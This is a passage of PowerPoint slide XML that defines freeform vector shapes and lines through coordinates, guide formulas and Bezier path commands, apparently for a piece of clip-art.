                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1207" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="959" y="32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42" name="Freeform 14803"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5228" y="2689"/>
                  <a:ext cx="161" cy="80"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 827"/>
                    <a:gd name="T1" fmla="*/ 0 h 411"/>
                    <a:gd name="T2" fmla="*/ 0 w 827"/>
                    <a:gd name="T3" fmla="*/ 224 h 411"/>
                    <a:gd name="T4" fmla="*/ 694 w 827"/>
                    <a:gd name="T5" fmla="*/ 411 h 411"/>
                    <a:gd name="T6" fmla="*/ 827 w 827"/>
                    <a:gd name="T7" fmla="*/ 189 h 411"/>
                    <a:gd name="T8" fmla="*/ 0 w 827"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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27"/>
                    <a:gd name="T16" fmla="*/ 0 h 411"/>
                    <a:gd name="T17" fmla="*/ 827 w 827"/>
                    <a:gd name="T18" fmla="*/ 411 h 4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27" h="411">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="224"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="694" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="827" y="18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43" name="Freeform 14804"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5363" y="2760"/>
                  <a:ext cx="174" cy="389"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 896 w 896"/>
                    <a:gd name="T1" fmla="*/ 239 h 2001"/>
                    <a:gd name="T2" fmla="*/ 0 w 896"/>
                    <a:gd name="T3" fmla="*/ 0 h 2001"/>
                    <a:gd name="T4" fmla="*/ 0 w 896"/>
                    <a:gd name="T5" fmla="*/ 1777 h 2001"/>
                    <a:gd name="T6" fmla="*/ 896 w 896"/>
                    <a:gd name="T7" fmla="*/ 2001 h 2001"/>
                    <a:gd name="T8" fmla="*/ 896 w 896"/>
                    <a:gd name="T9" fmla="*/ 239 h 200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6"/>
                    <a:gd name="T16" fmla="*/ 0 h 2001"/>
                    <a:gd name="T17" fmla="*/ 896 w 896"/>
                    <a:gd name="T18" fmla="*/ 2001 h 200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6" h="2001">
                      <a:moveTo>
                        <a:pt x="896" y="239"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="896" y="2001"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="896" y="23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44" name="Freeform 14805"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5228" y="2724"/>
                  <a:ext cx="135" cy="380"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 294 w 294"/>
                    <a:gd name="T1" fmla="*/ 79 h 829"/>
                    <a:gd name="T2" fmla="*/ 0 w 294"/>
                    <a:gd name="T3" fmla="*/ 0 h 829"/>
                    <a:gd name="T4" fmla="*/ 0 w 294"/>
                    <a:gd name="T5" fmla="*/ 808 h 829"/>
                    <a:gd name="T6" fmla="*/ 294 w 294"/>
                    <a:gd name="T7" fmla="*/ 829 h 829"/>
                    <a:gd name="T8" fmla="*/ 294 w 294"/>
                    <a:gd name="T9" fmla="*/ 79 h 8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4"/>
                    <a:gd name="T16" fmla="*/ 0 h 829"/>
                    <a:gd name="T17" fmla="*/ 294 w 294"/>
                    <a:gd name="T18" fmla="*/ 829 h 8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4" h="829">
                      <a:moveTo>
                        <a:pt x="294" y="79"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="246" y="79"/>
                        <a:pt x="24" y="6"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="808"/>
                        <a:pt x="0" y="808"/>
                        <a:pt x="0" y="808"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="294" y="829"/>
                        <a:pt x="294" y="829"/>
                        <a:pt x="294" y="829"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="294" y="7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45" name="Freeform 14806"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5378" y="2763"/>
                  <a:ext cx="150" cy="346"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 772"/>
                    <a:gd name="T1" fmla="*/ 0 h 1777"/>
                    <a:gd name="T2" fmla="*/ 0 w 772"/>
                    <a:gd name="T3" fmla="*/ 1720 h 1777"/>
                    <a:gd name="T4" fmla="*/ 224 w 772"/>
                    <a:gd name="T5" fmla="*/ 1777 h 1777"/>
                    <a:gd name="T6" fmla="*/ 772 w 772"/>
                    <a:gd name="T7" fmla="*/ 1463 h 1777"/>
                    <a:gd name="T8" fmla="*/ 772 w 772"/>
                    <a:gd name="T9" fmla="*/ 208 h 1777"/>
                    <a:gd name="T10" fmla="*/ 0 w 772"/>
                    <a:gd name="T11" fmla="*/ 0 h 177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772"/>
                    <a:gd name="T19" fmla="*/ 0 h 1777"/>
                    <a:gd name="T20" fmla="*/ 772 w 772"/>
                    <a:gd name="T21" fmla="*/ 1777 h 177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772" h="1777">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1720"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="224" y="1777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="772" y="1463"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="772" y="20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46" name="Freeform 14807"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5387" y="2772"/>
                  <a:ext cx="132" cy="151"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 682"/>
                    <a:gd name="T1" fmla="*/ 0 h 775"/>
                    <a:gd name="T2" fmla="*/ 0 w 682"/>
                    <a:gd name="T3" fmla="*/ 591 h 775"/>
                    <a:gd name="T4" fmla="*/ 682 w 682"/>
                    <a:gd name="T5" fmla="*/ 775 h 775"/>
                    <a:gd name="T6" fmla="*/ 682 w 682"/>
                    <a:gd name="T7" fmla="*/ 185 h 775"/>
                    <a:gd name="T8" fmla="*/ 0 w 682"/>
                    <a:gd name="T9" fmla="*/ 0 h 77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82"/>
                    <a:gd name="T16" fmla="*/ 0 h 775"/>
                    <a:gd name="T17" fmla="*/ 682 w 682"/>
                    <a:gd name="T18" fmla="*/ 775 h 77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82" h="775">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="591"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="682" y="775"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="682" y="18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47" name="Freeform 14808"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5537" y="2928"/>
                  <a:ext cx="41" cy="117"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 210 w 210"/>
                    <a:gd name="T1" fmla="*/ 85 h 602"/>
                    <a:gd name="T2" fmla="*/ 3 w 210"/>
                    <a:gd name="T3" fmla="*/ 0 h 602"/>
                    <a:gd name="T4" fmla="*/ 0 w 210"/>
                    <a:gd name="T5" fmla="*/ 602 h 602"/>
                    <a:gd name="T6" fmla="*/ 210 w 210"/>
                    <a:gd name="T7" fmla="*/ 527 h 602"/>
                    <a:gd name="T8" fmla="*/ 210 w 210"/>
                    <a:gd name="T9" fmla="*/ 85 h 6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10"/>
                    <a:gd name="T16" fmla="*/ 0 h 602"/>
                    <a:gd name="T17" fmla="*/ 210 w 210"/>
                    <a:gd name="T18" fmla="*/ 602 h 6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10" h="602">
                      <a:moveTo>
                        <a:pt x="210" y="85"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="602"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="527"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="8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48" name="Freeform 14809"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5752" y="2857"/>
                  <a:ext cx="48" cy="160"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 248 w 248"/>
                    <a:gd name="T1" fmla="*/ 0 h 822"/>
                    <a:gd name="T2" fmla="*/ 2 w 248"/>
                    <a:gd name="T3" fmla="*/ 177 h 822"/>
                    <a:gd name="T4" fmla="*/ 0 w 248"/>
                    <a:gd name="T5" fmla="*/ 822 h 822"/>
                    <a:gd name="T6" fmla="*/ 248 w 248"/>
                    <a:gd name="T7" fmla="*/ 707 h 822"/>
                    <a:gd name="T8" fmla="*/ 248 w 248"/>
                    <a:gd name="T9" fmla="*/ 0 h 8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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 822"/>
                    <a:gd name="T17" fmla="*/ 248 w 248"/>
                    <a:gd name="T18" fmla="*/ 822 h 8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8" h="822">
                      <a:moveTo>
                        <a:pt x="248" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="2" y="177"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="822"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="248" y="707"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="248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49" name="Freeform 14810"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5537" y="2910"/>
                  <a:ext cx="66" cy="34"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 207 w 340"/>
                    <a:gd name="T1" fmla="*/ 177 h 177"/>
                    <a:gd name="T2" fmla="*/ 340 w 340"/>
                    <a:gd name="T3" fmla="*/ 0 h 177"/>
                    <a:gd name="T4" fmla="*/ 0 w 340"/>
                    <a:gd name="T5" fmla="*/ 92 h 177"/>
                    <a:gd name="T6" fmla="*/ 207 w 340"/>
                    <a:gd name="T7" fmla="*/ 177 h 17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40"/>
                    <a:gd name="T13" fmla="*/ 0 h 177"/>
                    <a:gd name="T14" fmla="*/ 340 w 340"/>
                    <a:gd name="T15" fmla="*/ 177 h 17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40" h="177">
                      <a:moveTo>
                        <a:pt x="207" y="177"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="340" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="92"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="207" y="17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0" name="Freeform 14811"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5725" y="2857"/>
                  <a:ext cx="75" cy="34"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 350 w 390"/>
                    <a:gd name="T1" fmla="*/ 177 h 177"/>
                    <a:gd name="T2" fmla="*/ 390 w 390"/>
                    <a:gd name="T3" fmla="*/ 0 h 177"/>
                    <a:gd name="T4" fmla="*/ 0 w 390"/>
                    <a:gd name="T5" fmla="*/ 107 h 177"/>
                    <a:gd name="T6" fmla="*/ 350 w 390"/>
                    <a:gd name="T7" fmla="*/ 177 h 17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90"/>
                    <a:gd name="T13" fmla="*/ 0 h 177"/>
                    <a:gd name="T14" fmla="*/ 390 w 390"/>
                    <a:gd name="T15" fmla="*/ 177 h 17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90" h="177">
                      <a:moveTo>
                        <a:pt x="350" y="177"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="390" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="107"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17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1" name="Freeform 14812"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5923" y="3024"/>
                  <a:ext cx="95" cy="74"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 190 w 207"/>
                    <a:gd name="T1" fmla="*/ 0 h 160"/>
                    <a:gd name="T2" fmla="*/ 0 w 207"/>
                    <a:gd name="T3" fmla="*/ 51 h 160"/>
                    <a:gd name="T4" fmla="*/ 8 w 207"/>
                    <a:gd name="T5" fmla="*/ 160 h 160"/>
                    <a:gd name="T6" fmla="*/ 198 w 207"/>
                    <a:gd name="T7" fmla="*/ 109 h 160"/>
                    <a:gd name="T8" fmla="*/ 190 w 207"/>
                    <a:gd name="T9" fmla="*/ 0 h 16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07"/>
                    <a:gd name="T16" fmla="*/ 0 h 160"/>
                    <a:gd name="T17" fmla="*/ 207 w 207"/>
                    <a:gd name="T18" fmla="*/ 160 h 16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07" h="160">
                      <a:moveTo>
                        <a:pt x="190" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="160"/>
                        <a:pt x="8" y="160"/>
                        <a:pt x="8" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="198" y="109"/>
                        <a:pt x="198" y="109"/>
                        <a:pt x="198" y="109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="78"/>
                        <a:pt x="195" y="5"/>
                        <a:pt x="19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2" name="Freeform 14813"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5870" y="2978"/>
                  <a:ext cx="140" cy="70"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 190 w 305"/>
                    <a:gd name="T1" fmla="*/ 0 h 151"/>
                    <a:gd name="T2" fmla="*/ 0 w 305"/>
                    <a:gd name="T3" fmla="*/ 51 h 151"/>
                    <a:gd name="T4" fmla="*/ 115 w 305"/>
                    <a:gd name="T5" fmla="*/ 151 h 151"/>
                    <a:gd name="T6" fmla="*/ 305 w 305"/>
                    <a:gd name="T7" fmla="*/ 100 h 151"/>
                    <a:gd name="T8" fmla="*/ 190 w 305"/>
                    <a:gd name="T9" fmla="*/ 0 h 15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5"/>
                    <a:gd name="T16" fmla="*/ 0 h 151"/>
                    <a:gd name="T17" fmla="*/ 305 w 305"/>
                    <a:gd name="T18" fmla="*/ 151 h 15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5" h="151">
                      <a:moveTo>
                        <a:pt x="190" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="115" y="151"/>
                        <a:pt x="115" y="151"/>
                        <a:pt x="115" y="151"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="305" y="100"/>
                        <a:pt x="305" y="100"/>
                        <a:pt x="305" y="100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="296" y="91"/>
                        <a:pt x="208" y="7"/>
                        <a:pt x="19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3" name="Freeform 14814"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5773" y="2954"/>
                  <a:ext cx="184" cy="48"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 190 w 401"/>
                    <a:gd name="T1" fmla="*/ 0 h 103"/>
                    <a:gd name="T2" fmla="*/ 0 w 401"/>
                    <a:gd name="T3" fmla="*/ 51 h 103"/>
                    <a:gd name="T4" fmla="*/ 211 w 401"/>
                    <a:gd name="T5" fmla="*/ 103 h 103"/>
                    <a:gd name="T6" fmla="*/ 401 w 401"/>
                    <a:gd name="T7" fmla="*/ 52 h 103"/>
                    <a:gd name="T8" fmla="*/ 190 w 401"/>
                    <a:gd name="T9" fmla="*/ 0 h 10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01"/>
                    <a:gd name="T16" fmla="*/ 0 h 103"/>
                    <a:gd name="T17" fmla="*/ 401 w 401"/>
                    <a:gd name="T18" fmla="*/ 103 h 10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01" h="103">
                      <a:moveTo>
                        <a:pt x="190" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="0"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="211" y="103"/>
                        <a:pt x="211" y="103"/>
                        <a:pt x="211" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="401" y="52"/>
                        <a:pt x="401" y="52"/>
                        <a:pt x="401" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="383" y="46"/>
                        <a:pt x="213" y="0"/>
                        <a:pt x="19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4" name="Freeform 14815"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5578" y="2874"/>
                  <a:ext cx="335" cy="271"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 731 w 731"/>
                    <a:gd name="T1" fmla="*/ 103 h 590"/>
                    <a:gd name="T2" fmla="*/ 351 w 731"/>
                    <a:gd name="T3" fmla="*/ 0 h 590"/>
                    <a:gd name="T4" fmla="*/ 352 w 731"/>
                    <a:gd name="T5" fmla="*/ 2 h 590"/>
                    <a:gd name="T6" fmla="*/ 325 w 731"/>
                    <a:gd name="T7" fmla="*/ 3 h 590"/>
                    <a:gd name="T8" fmla="*/ 57 w 731"/>
                    <a:gd name="T9" fmla="*/ 81 h 590"/>
                    <a:gd name="T10" fmla="*/ 56 w 731"/>
                    <a:gd name="T11" fmla="*/ 81 h 590"/>
                    <a:gd name="T12" fmla="*/ 0 w 731"/>
                    <a:gd name="T13" fmla="*/ 154 h 590"/>
                    <a:gd name="T14" fmla="*/ 0 w 731"/>
                    <a:gd name="T15" fmla="*/ 488 h 590"/>
                    <a:gd name="T16" fmla="*/ 0 w 731"/>
                    <a:gd name="T17" fmla="*/ 488 h 590"/>
                    <a:gd name="T18" fmla="*/ 0 w 731"/>
                    <a:gd name="T19" fmla="*/ 488 h 590"/>
                    <a:gd name="T20" fmla="*/ 0 w 731"/>
                    <a:gd name="T21" fmla="*/ 489 h 590"/>
                    <a:gd name="T22" fmla="*/ 3 w 731"/>
                    <a:gd name="T23" fmla="*/ 488 h 590"/>
                    <a:gd name="T24" fmla="*/ 379 w 731"/>
                    <a:gd name="T25" fmla="*/ 590 h 590"/>
                    <a:gd name="T26" fmla="*/ 731 w 731"/>
                    <a:gd name="T27" fmla="*/ 103 h 59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31"/>
                    <a:gd name="T43" fmla="*/ 0 h 590"/>
                    <a:gd name="T44" fmla="*/ 731 w 731"/>
                    <a:gd name="T45" fmla="*/ 590 h 59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31" h="590">
                      <a:moveTo>
                        <a:pt x="731" y="103"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="351" y="0"/>
                        <a:pt x="351" y="0"/>
                        <a:pt x="351" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="352" y="2"/>
                        <a:pt x="352" y="2"/>
                        <a:pt x="352" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="344" y="0"/>
                        <a:pt x="335" y="0"/>
                        <a:pt x="325" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="325" y="3"/>
                        <a:pt x="58" y="80"/>
                        <a:pt x="57" y="81"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="81"/>
                        <a:pt x="56" y="81"/>
                        <a:pt x="56" y="81"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="90"/>
                        <a:pt x="0" y="123"/>
                        <a:pt x="0" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="488"/>
                        <a:pt x="0" y="488"/>
                        <a:pt x="0" y="488"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="488"/>
                        <a:pt x="0" y="488"/>
                        <a:pt x="0" y="488"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="488"/>
                        <a:pt x="0" y="488"/>
                        <a:pt x="0" y="488"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="489"/>
                        <a:pt x="0" y="489"/>
                        <a:pt x="0" y="489"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="488"/>
                        <a:pt x="3" y="488"/>
                        <a:pt x="3" y="488"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="379" y="590"/>
                        <a:pt x="379" y="590"/>
                        <a:pt x="379" y="590"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="731" y="103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5" name="Freeform 14816"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5752" y="2917"/>
                  <a:ext cx="175" cy="228"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 381 w 381"/>
                    <a:gd name="T1" fmla="*/ 50 h 495"/>
                    <a:gd name="T2" fmla="*/ 325 w 381"/>
                    <a:gd name="T3" fmla="*/ 9 h 495"/>
                    <a:gd name="T4" fmla="*/ 57 w 381"/>
                    <a:gd name="T5" fmla="*/ 87 h 495"/>
                    <a:gd name="T6" fmla="*/ 56 w 381"/>
                    <a:gd name="T7" fmla="*/ 87 h 495"/>
                    <a:gd name="T8" fmla="*/ 0 w 381"/>
                    <a:gd name="T9" fmla="*/ 160 h 495"/>
                    <a:gd name="T10" fmla="*/ 0 w 381"/>
                    <a:gd name="T11" fmla="*/ 495 h 495"/>
                    <a:gd name="T12" fmla="*/ 381 w 381"/>
                    <a:gd name="T13" fmla="*/ 393 h 495"/>
                    <a:gd name="T14" fmla="*/ 381 w 381"/>
                    <a:gd name="T15" fmla="*/ 323 h 495"/>
                    <a:gd name="T16" fmla="*/ 381 w 381"/>
                    <a:gd name="T17" fmla="*/ 50 h 49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81"/>
                    <a:gd name="T28" fmla="*/ 0 h 495"/>
                    <a:gd name="T29" fmla="*/ 381 w 381"/>
                    <a:gd name="T30" fmla="*/ 495 h 49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81" h="495">
                      <a:moveTo>
                        <a:pt x="381" y="50"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="381" y="18"/>
                        <a:pt x="356" y="0"/>
                        <a:pt x="325" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="325" y="9"/>
                        <a:pt x="58" y="86"/>
                        <a:pt x="57" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="87"/>
                        <a:pt x="56" y="87"/>
                        <a:pt x="56" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="96"/>
                        <a:pt x="0" y="129"/>
                        <a:pt x="0" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="495"/>
                        <a:pt x="0" y="495"/>
                        <a:pt x="0" y="495"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="381" y="393"/>
                        <a:pt x="381" y="393"/>
                        <a:pt x="381" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="381" y="393"/>
                        <a:pt x="381" y="325"/>
                        <a:pt x="381" y="323"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="381" y="5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6" name="Freeform 14817"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5766" y="2944"/>
                  <a:ext cx="149" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 324 w 324"/>
                    <a:gd name="T1" fmla="*/ 275 h 411"/>
                    <a:gd name="T2" fmla="*/ 276 w 324"/>
                    <a:gd name="T3" fmla="*/ 338 h 411"/>
                    <a:gd name="T4" fmla="*/ 48 w 324"/>
                    <a:gd name="T5" fmla="*/ 404 h 411"/>
                    <a:gd name="T6" fmla="*/ 0 w 324"/>
                    <a:gd name="T7" fmla="*/ 369 h 411"/>
                    <a:gd name="T8" fmla="*/ 0 w 324"/>
                    <a:gd name="T9" fmla="*/ 137 h 411"/>
                    <a:gd name="T10" fmla="*/ 48 w 324"/>
                    <a:gd name="T11" fmla="*/ 74 h 411"/>
                    <a:gd name="T12" fmla="*/ 276 w 324"/>
                    <a:gd name="T13" fmla="*/ 8 h 411"/>
                    <a:gd name="T14" fmla="*/ 324 w 324"/>
                    <a:gd name="T15" fmla="*/ 43 h 411"/>
                    <a:gd name="T16" fmla="*/ 324 w 324"/>
                    <a:gd name="T17" fmla="*/ 275 h 41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24"/>
                    <a:gd name="T28" fmla="*/ 0 h 411"/>
                    <a:gd name="T29" fmla="*/ 324 w 324"/>
                    <a:gd name="T30" fmla="*/ 411 h 41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24" h="411">
                      <a:moveTo>
                        <a:pt x="324" y="275"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="324" y="302"/>
                        <a:pt x="303" y="330"/>
                        <a:pt x="276" y="338"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="404"/>
                        <a:pt x="48" y="404"/>
                        <a:pt x="48" y="404"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="411"/>
                        <a:pt x="0" y="396"/>
                        <a:pt x="0" y="369"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="137"/>
                        <a:pt x="0" y="137"/>
                        <a:pt x="0" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="110"/>
                        <a:pt x="21" y="82"/>
                        <a:pt x="48" y="74"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="276" y="8"/>
                        <a:pt x="276" y="8"/>
                        <a:pt x="276" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="303" y="0"/>
                        <a:pt x="324" y="16"/>
                        <a:pt x="324" y="43"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="324" y="2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7" name="Line 14818"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5877" y="2953"/>
                  <a:ext cx="0" cy="15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8" name="Line 14819"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5840" y="2963"/>
                  <a:ext cx="0" cy="15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9" name="Line 14820"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5803" y="2973"/>
                  <a:ext cx="0" cy="15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0" name="Line 14821"/>
                <p:cNvSpPr>
